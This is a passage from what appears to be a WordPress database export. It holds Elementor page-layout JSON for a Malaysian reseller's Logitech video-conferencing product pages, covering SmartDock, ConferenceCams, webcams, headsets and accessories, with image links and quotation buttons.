device.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4df46a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dcde8ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-2.jpg\",\"id\":3036}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"705260b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ece995b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2a41a9a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-3.jpg\",\"id\":3037}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0ed16d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"8d03f27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPLETE THE EXPERIENCE<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e3a52b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cdc1fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"145cf08\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b612093\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"491e24c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"67df618\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4f33f87\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM<\\/h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5358850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65020ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXTENDED I\\/O FOR SURFACE PRO<\\/h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1283944\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bbe9fd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ENERGY-SAVING HIBERNATION<\\/h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ad2c4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7a14c34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT<\\/h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cebd381\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"498ce51\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"64b49a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SUPERIOR CABLE MANAGEMENT<\\/h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7bd1a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a733024\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY ACCESS TO ROOM AV<\\/h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the room\\u2019s camera, speakerphone, and display accessible to a user\\u2019s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40d4a0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"80afd57\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6075,3040,'_elementor_version','0.4'),(6078,3041,'_wp_page_template','template-fullwidth.php'),(6079,3041,'_elementor_edit_mode','builder'),(6080,3041,'_elementor_template_type','post'),(6081,3041,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.153,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":66.844},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"cd63719\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-bcc950\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally-camera\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"dfe8149\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally-camera\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":20,\"padding\":{\"unit\":\"px\",\"top\":\"45\",\"right\":\"45\",\"bottom\":\"45\",\"left\":\"45\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 